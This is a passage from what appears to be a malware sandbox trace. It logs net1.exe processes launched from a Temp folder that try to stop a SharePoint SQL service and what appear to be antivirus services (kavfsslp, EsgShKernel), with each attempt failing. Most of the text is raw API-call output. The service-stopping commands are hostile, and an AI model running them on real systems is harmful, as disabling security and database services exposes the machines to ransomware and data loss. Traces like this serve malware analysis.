_String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.462] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.462] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0120.462] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0120.462] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0120.462] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0120.462] _wcsupr (in: _String="MSSQLFDLauncher$SHAREPOINT" | out: _String="MSSQLFDLAUNCHER$SHAREPOINT") returned="MSSQLFDLAUNCHER$SHAREPOINT" [0120.462] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4a54c0 [0120.904] GetServiceKeyNameW (in: hSCManager=0x4a54c0, lpDisplayName="MSSQLFDLAUNCHER$SHAREPOINT", lpServiceName=0x39aaf0, lpcchBuffer=0x2ff8c0 | out: lpServiceName="", lpcchBuffer=0x2ff8c0) returned 0 [0120.905] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0120.905] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -14 [0120.905] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0120.905] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0120.905] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0120.905] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0120.905] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0120.905] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0120.905] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0120.905] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0120.905] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 3 [0120.905] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -9 [0120.905] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0120.905] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0120.905] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0120.905] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0120.905] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0120.905] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0120.905] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 1 [0120.905] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x2ff8bc | out: bufptr=0x2ff8bc) returned 0x889 [0120.907] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.907] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.907] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.908] GetFileType (hFile=0x0) returned 0x0 [0120.908] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4a3b48 [0120.908] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4a3b48, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.908] WriteFile (in: hFile=0x0, lpBuffer=0x4a3b48, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff7fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff7fc, lpOverlapped=0x0) returned 0 [0120.909] LocalFree (hMem=0x4a3b48) returned 0x0 [0120.909] GetFileType (hFile=0x0) returned 0x0 [0120.909] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4a6178 [0120.909] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nJ", lpUsedDefaultChar=0x0) returned 2 [0120.909] WriteFile (in: hFile=0x0, lpBuffer=0x4a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff7fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff7fc, lpOverlapped=0x0) returned 0 [0120.909] LocalFree (hMem=0x4a6178) returned 0x0 [0120.909] _ultow (in: _Dest=0x889, _Radix=3143724 | out: _Dest=0x889) returned="2185" [0120.909] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.909] GetFileType (hFile=0x0) returned 0x0 [0120.909] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4a6178 [0120.909] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4a6178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.909] WriteFile (in: hFile=0x0, lpBuffer=0x4a6178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff808, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff808, lpOverlapped=0x0) returned 0 [0120.909] LocalFree (hMem=0x4a6178) returned 0x0 [0120.909] GetFileType (hFile=0x0) returned 0x0 [0120.909] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4a6178 [0120.909] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nJ", lpUsedDefaultChar=0x0) returned 2 [0120.909] WriteFile (in: hFile=0x0, lpBuffer=0x4a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff808, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff808, lpOverlapped=0x0) returned 0 [0120.909] LocalFree (hMem=0x4a6178) returned 0x0 [0120.910] NetApiBufferFree (Buffer=0x4a1b10) returned 0x0 [0120.910] NetApiBufferFree (Buffer=0x4a1b28) returned 0x0 [0120.910] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0120.910] exit (_Code=2) Process: id = "248" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5eb43000" os_pid = "0x624" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "120" os_parent_pid = "0xcc8" cmd_line = "C:\\Windows\\system32\\net1 stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 642 os_tid = 0xdc4 [0120.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfe6c | out: lpSystemTimeAsFileTime=0x1bfe6c*(dwLowDateTime=0x1b900230, dwHighDateTime=0x1d6f0d1)) [0120.493] GetCurrentProcessId () returned 0x624 [0120.493] GetCurrentThreadId () returned 0xdc4 [0120.493] GetTickCount () returned 0x115165f [0120.493] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfe64 | out: lpPerformanceCount=0x1bfe64*=23959389619) returned 1 [0120.493] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.493] __set_app_type (_Type=0x1) [0120.493] __p__fmode () returned 0x770331f4 [0120.493] __p__commode () returned 0x770331fc [0120.494] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.494] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.494] GetConsoleOutputCP () returned 0x1b5 [0120.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.497] sprintf_s (in: _DstBuf=0x1bfe24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.497] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0120.499] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.499] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0120.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfbf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.500] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x64) returned 0x4f3ad8 [0120.500] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfdf4 | out: Buffer=0x1bfdf4*=0x4f1ae0) returned 0x0 [0120.500] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfdf4 | out: Buffer=0x1bfdf4*=0x4f1af8) returned 0x0 [0120.500] _fileno (_File=0x77032900) returned -2 [0120.500] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.500] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.500] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.500] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.500] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.500] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.500] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.500] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.500] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.500] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.500] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.500] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.500] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.500] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.500] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.500] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.500] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.501] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.501] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.501] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.501] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.501] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.501] _wcsicmp (_String1="accounts", _String2="kavfsslp") returned -10 [0120.501] _wcsicmp (_String1="computer", _String2="kavfsslp") returned -8 [0120.501] _wcsicmp (_String1="config", _String2="kavfsslp") returned -8 [0120.501] _wcsicmp (_String1="continue", _String2="kavfsslp") returned -8 [0120.501] _wcsicmp (_String1="cont", _String2="kavfsslp") returned -8 [0120.501] _wcsicmp (_String1="file", _String2="kavfsslp") returned -5 [0120.501] _wcsicmp (_String1="files", _String2="kavfsslp") returned -5 [0120.501] _wcsicmp (_String1="group", _String2="kavfsslp") returned -4 [0120.501] _wcsicmp (_String1="groups", _String2="kavfsslp") returned -4 [0120.501] _wcsicmp (_String1="help", _String2="kavfsslp") returned -3 [0120.501] _wcsicmp (_String1="helpmsg", _String2="kavfsslp") returned -3 [0120.501] _wcsicmp (_String1="localgroup", _String2="kavfsslp") returned 1 [0120.501] _wcsicmp (_String1="pause", _String2="kavfsslp") returned 5 [0120.501] _wcsicmp (_String1="session", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="sessions", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="sess", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="share", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="start", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="stats", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="statistics", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="stop", _String2="kavfsslp") returned 8 [0120.501] _wcsicmp (_String1="time", _String2="kavfsslp") returned 9 [0120.501] _wcsicmp (_String1="user", _String2="kavfsslp") returned 10 [0120.501] _wcsicmp (_String1="users", _String2="kavfsslp") returned 10 [0120.501] _wcsicmp (_String1="msg", _String2="kavfsslp") returned 2 [0120.501] _wcsicmp (_String1="messenger", _String2="kavfsslp") returned 2 [0120.501] _wcsicmp (_String1="receiver", _String2="kavfsslp") returned 7 [0120.501] _wcsicmp (_String1="rcv", _String2="kavfsslp") returned 7 [0120.501] _wcsicmp (_String1="netpopup", _String2="kavfsslp") returned 3 [0120.501] _wcsicmp (_String1="redirector", _String2="kavfsslp") returned 7 [0120.502] _wcsicmp (_String1="redir", _String2="kavfsslp") returned 7 [0120.502] _wcsicmp (_String1="rdr", _String2="kavfsslp") returned 7 [0120.502] _wcsicmp (_String1="workstation", _String2="kavfsslp") returned 12 [0120.502] _wcsicmp (_String1="work", _String2="kavfsslp") returned 12 [0120.502] _wcsicmp (_String1="wksta", _String2="kavfsslp") returned 12 [0120.502] _wcsicmp (_String1="prdr", _String2="kavfsslp") returned 5 [0120.502] _wcsicmp (_String1="devrdr", _String2="kavfsslp") returned -7 [0120.502] _wcsicmp (_String1="lanmanworkstation", _String2="kavfsslp") returned 1 [0120.502] _wcsicmp (_String1="server", _String2="kavfsslp") returned 8 [0120.502] _wcsicmp (_String1="svr", _String2="kavfsslp") returned 8 [0120.502] _wcsicmp (_String1="srv", _String2="kavfsslp") returned 8 [0120.502] _wcsicmp (_String1="lanmanserver", _String2="kavfsslp") returned 1 [0120.502] _wcsicmp (_String1="alerter", _String2="kavfsslp") returned -10 [0120.502] _wcsicmp (_String1="netlogon", _String2="kavfsslp") returned 3 [0120.502] _wcsupr (in: _String="kavfsslp" | out: _String="KAVFSSLP") returned="KAVFSSLP" [0120.502] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4f54a8 [0120.912] GetServiceKeyNameW (in: hSCManager=0x4f54a8, lpDisplayName="KAVFSSLP", lpServiceName=0x39aaf0, lpcchBuffer=0x1bfd90 | out: lpServiceName="", lpcchBuffer=0x1bfd90) returned 0 [0120.913] _wcsicmp (_String1="msg", _String2="KAVFSSLP") returned 2 [0120.913] _wcsicmp (_String1="messenger", _String2="KAVFSSLP") returned 2 [0120.913] _wcsicmp (_String1="receiver", _String2="KAVFSSLP") returned 7 [0120.913] _wcsicmp (_String1="rcv", _String2="KAVFSSLP") returned 7 [0120.913] _wcsicmp (_String1="redirector", _String2="KAVFSSLP") returned 7 [0120.913] _wcsicmp (_String1="redir", _String2="KAVFSSLP") returned 7 [0120.913] _wcsicmp (_String1="rdr", _String2="KAVFSSLP") returned 7 [0120.913] _wcsicmp (_String1="workstation", _String2="KAVFSSLP") returned 12 [0120.913] _wcsicmp (_String1="work", _String2="KAVFSSLP") returned 12 [0120.913] _wcsicmp (_String1="wksta", _String2="KAVFSSLP") returned 12 [0120.913] _wcsicmp (_String1="prdr", _String2="KAVFSSLP") returned 5 [0120.913] _wcsicmp (_String1="devrdr", _String2="KAVFSSLP") returned -7 [0120.913] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSSLP") returned 1 [0120.913] _wcsicmp (_String1="server", _String2="KAVFSSLP") returned 8 [0120.913] _wcsicmp (_String1="svr", _String2="KAVFSSLP") returned 8 [0120.913] _wcsicmp (_String1="srv", _String2="KAVFSSLP") returned 8 [0120.913] _wcsicmp (_String1="lanmanserver", _String2="KAVFSSLP") returned 1 [0120.913] _wcsicmp (_String1="alerter", _String2="KAVFSSLP") returned -10 [0120.913] _wcsicmp (_String1="netlogon", _String2="KAVFSSLP") returned 3 [0120.913] NetServiceControl (in: servername=0x0, service="KAVFSSLP", opcode=0x0, arg=0x0, bufptr=0x1bfd8c | out: bufptr=0x1bfd8c) returned 0x889 [0120.915] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.915] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.915] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.917] GetFileType (hFile=0x0) returned 0x0 [0120.917] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4f3ec0 [0120.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4f3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.917] WriteFile (in: hFile=0x0, lpBuffer=0x4f3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfccc, lpOverlapped=0x0) returned 0 [0120.917] LocalFree (hMem=0x4f3ec0) returned 0x0 [0120.917] GetFileType (hFile=0x0) returned 0x0 [0120.917] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4f6170 [0120.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4f6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nO", lpUsedDefaultChar=0x0) returned 2 [0120.917] WriteFile (in: hFile=0x0, lpBuffer=0x4f6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfccc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfccc, lpOverlapped=0x0) returned 0 [0120.917] LocalFree (hMem=0x4f6170) returned 0x0 [0120.917] _ultow (in: _Dest=0x889, _Radix=1834236 | out: _Dest=0x889) returned="2185" [0120.917] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.917] GetFileType (hFile=0x0) returned 0x0 [0120.917] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4f6170 [0120.917] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4f6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.917] WriteFile (in: hFile=0x0, lpBuffer=0x4f6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfcd8, lpOverlapped=0x0) returned 0 [0120.917] LocalFree (hMem=0x4f6170) returned 0x0 [0120.917] GetFileType (hFile=0x0) returned 0x0 [0120.917] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4f6170 [0120.918] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4f6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nO", lpUsedDefaultChar=0x0) returned 2 [0120.918] WriteFile (in: hFile=0x0, lpBuffer=0x4f6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfcd8, lpOverlapped=0x0) returned 0 [0120.918] LocalFree (hMem=0x4f6170) returned 0x0 [0120.918] NetApiBufferFree (Buffer=0x4f1ae0) returned 0x0 [0120.918] NetApiBufferFree (Buffer=0x4f1af8) returned 0x0 [0120.918] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0120.918] exit (_Code=2) Process: id = "249" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5e756000" os_pid = "0x90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "128" os_parent_pid = "0xb7c" cmd_line = "C:\\Windows\\system32\\net1 stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 643 os_tid = 0xdc8 [0120.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef8bc | out: lpSystemTimeAsFileTime=0x2ef8bc*(dwLowDateTime=0x1bd04750, dwHighDateTime=0x1d6f0d1)) [0120.928] GetCurrentProcessId () returned 0x90 [0120.928] GetCurrentThreadId () returned 0xdc8 [0120.928] GetTickCount () returned 0x1151804 [0120.928] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef8b4 | out: lpPerformanceCount=0x2ef8b4*=24003082915) returned 1 [0120.930] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.930] __set_app_type (_Type=0x1) [0120.930] __p__fmode () returned 0x770331f4 [0120.930] __p__commode () returned 0x770331fc [0120.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.931] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.931] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.931] GetConsoleOutputCP () returned 0x1b5 [0120.931] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.934] sprintf_s (in: _DstBuf=0x2ef874, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.934] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.936] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0120.936] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.936] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0120.936] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ef640, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.936] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x6a) returned 0x143ad8 [0120.937] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.937] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ef844 | out: Buffer=0x2ef844*=0x141ae0) returned 0x0 [0120.937] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ef844 | out: Buffer=0x2ef844*=0x141af8) returned 0x0 [0120.937] _fileno (_File=0x77032900) returned -2 [0120.937] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.937] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.937] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.937] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.937] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.937] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.937] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.937] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.937] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.937] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.937] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.937] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.937] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.937] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.937] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.937] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.937] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.937] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.938] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.938] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.938] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.938] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.938] _wcsicmp (_String1="accounts", _String2="EsgShKernel") returned -4 [0120.938] _wcsicmp (_String1="computer", _String2="EsgShKernel") returned -2 [0120.938] _wcsicmp (_String1="config", _String2="EsgShKernel") returned -2 [0120.938] _wcsicmp (_String1="continue", _String2="EsgShKernel") returned -2 [0120.938] _wcsicmp (_String1="cont", _String2="EsgShKernel") returned -2 [0120.938] _wcsicmp (_String1="file", _String2="EsgShKernel") returned 1 [0120.938] _wcsicmp (_String1="files", _String2="EsgShKernel") returned 1 [0120.938] _wcsicmp (_String1="group", _String2="EsgShKernel") returned 2 [0120.938] _wcsicmp (_String1="groups", _String2="EsgShKernel") returned 2 [0120.938] _wcsicmp (_String1="help", _String2="EsgShKernel") returned 3 [0120.938] _wcsicmp (_String1="helpmsg", _String2="EsgShKernel") returned 3 [0120.938] _wcsicmp (_String1="localgroup", _String2="EsgShKernel") returned 7 [0120.938] _wcsicmp (_String1="pause", _String2="EsgShKernel") returned 11 [0120.938] _wcsicmp (_String1="session", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="sessions", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="sess", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="share", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="start", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="stats", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="statistics", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="stop", _String2="EsgShKernel") returned 14 [0120.938] _wcsicmp (_String1="time", _String2="EsgShKernel") returned 15 [0120.938] _wcsicmp (_String1="user", _String2="EsgShKernel") returned 16 [0120.938] _wcsicmp (_String1="users", _String2="EsgShKernel") returned 16 [0120.938] _wcsicmp (_String1="msg", _String2="EsgShKernel") returned 8 [0120.938] _wcsicmp (_String1="messenger", _String2="EsgShKernel") returned 8 [0120.938] _wcsicmp (_String1="receiver", _String2="EsgShKernel") returned 13 [0120.938] _wcsicmp (_String1="rcv", _String2="EsgShKernel") returned 13 [0120.938] _wcsicmp (_String1="netpopup", _String2="EsgShKernel") 